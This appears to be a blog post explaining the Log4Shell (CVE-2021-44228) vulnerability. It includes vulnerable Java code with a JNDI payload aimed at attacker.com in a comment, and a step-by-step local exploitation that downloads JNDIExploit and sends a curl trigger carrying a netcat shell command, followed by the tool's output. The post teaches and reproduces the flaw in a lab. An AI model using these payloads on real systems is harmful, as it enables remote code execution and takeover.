CVE-2021-44228 - Log4j

December 12, 2021 General

Why Log4j is so dangerous

CVE-2021-44228, also named Log4Shell or LogJam, is a Remote Code Execution (RCE) class vulnerability. If attackers manage to exploit it on one of the servers, they gain the ability to execute arbitrary code and potentially take full control of the system.

What makes CVE-2021-44228 especially dangerous is ease of exploitation: even an inexperienced hacker can successfully execute an attack using this vulnerability. According to the researchers, attackers only need to force the application to write just one string to the log, and after that they are able to upload their own code into the application due to the message lookup substitution function.

Working Proofs of Concept (PoC) for the attacks via CVE-2021-44228 are already available on the Internet. Therefore, it’s not surprising that cybersecurity companies are already registering massive network scans for vulnerable applications as well as attacks on honeypots.

This vulnerability was discovered by Chen Zhaojun of Alibaba Cloud Security Team.

What is Apache Log4J and why this library is so popular?

Apache Log4j is part of the Apache Logging Project. By and large, usage of this library is one of the easiest ways to log errors, and that is why most Java developers use it.

Many large software companies and online services use the Log4j library, including Amazon, Apple iCloud, Cisco, Cloudflare, ElasticSearch, Red Hat, Steam, Tesla, Twitter, and many more. Because of the library being so popular, some information security researchers expect significant increase of the attacks on vulnerable servers over the next few days.

How does it work?

So, in a nutshell, the Log4j component processes the input being logged, and when it sees the JNDI, it goes ahead and performs a lookup to fetch the Java object from the attacker-controlled LDAP (or DNS) server, loads it into the application runtime and then the application runs the malicious code.

Exploit Requirements

A server with a vulnerable log4j version (listed above),
an endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send the exploit string,
and a log statement that logs out the string from that request.

Example of Vulnerable Code:


import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

import java.io.*;
import java.sql.SQLException;
import java.util.*;

public class VulnerableLog4jExampleHandler implements HttpHandler {

  static Logger log = LogManager.getLogger(VulnerableLog4jExampleHandler.class.getName());

  /**
   * A simple HTTP endpoint that reads the request's User Agent and logs it back.
   * This is basically pseudo-code to explain the vulnerability, and not a full example.
   * @param he HTTP Request Object
   */
  public void handle(HttpExchange he) throws IOException {
    String userAgent = he.getRequestHeader("user-agent");

    // This line triggers the RCE by logging the attacker-controlled HTTP User Agent header.
    // The attacker can set their User-Agent header to: ${jndi:ldap://attacker.com/a}
    log.info("Request User Agent:{}", userAgent);

    String response = "Hello There, " + userAgent + "!";
    he.sendResponseHeaders(200, response.length());
    OutputStream os = he.getResponseBody();
    os.write(response.getBytes());
    os.close();
  }
}

Reproducing Locally

If you want to reproduce this vulnerability locally, you can refer to christophetd's vulnerable app.

In terminal run it:

docker run --name vulnerable-app -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app

Exploitation steps

Use JNDIExploit to spin up a malicious LDAP server

wget https://github.com/feihong-cs/JNDIExploit/releases/download/v1.2/JNDIExploit.v1.2.zip

unzip JNDIExploit.v1.2.zip

java -jar JNDIExploit-1.2-SNAPSHOT.jar -i my-local-ip -p 8888

Then, trigger the exploit using:

curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://10.29.22.169:1389/Basic/Command/nc -lnvp 5555 -e sh}'

Notice the output of JNDIExploit, showing it has sent a malicious LDAP response and served the second-stage payload:

[+] LDAP Server Start Listening on 1389...
[+] HTTP Server Start Listening on 8888...
[+] Received LDAP Query: Basic/Command/nc -lnvp 5555 -e sh
[+] Paylaod: command
[+] Command: nc -lnvp 5555 -e sh
[+] Sending LDAP ResourceRef result for Basic/Command/nc -lnvp 5555 -e sh with basic remote reference payload
[+] Send LDAP reference result for Basic/Command/nc -lnvp 5555 -e sh redirecting to http://10.29.22.169:8888/Exploitbh8DUI237i.class
[+] New HTTP Request From /172.17.0.2:50854  /Exploitbh8DUI237i.class
[+] Receive ClassRequest: Exploitbh8DUI237i.class
[+] Response Code: 200

ReverseShell

To get a reverse shell in another terminal we type:

nc ip-docker-container port

Thanks

---
source:
https://github.com/christophetd/log4shell-vulnerable-app
https://www.lunasec.io/docs/blog/log4j-zero-day/
https://www.randori.com/blog/cve-2021-44228/
https://www.fastly.com/blog/digging-deeper-into-log4shell-0day-rce-exploit-found-in-log4j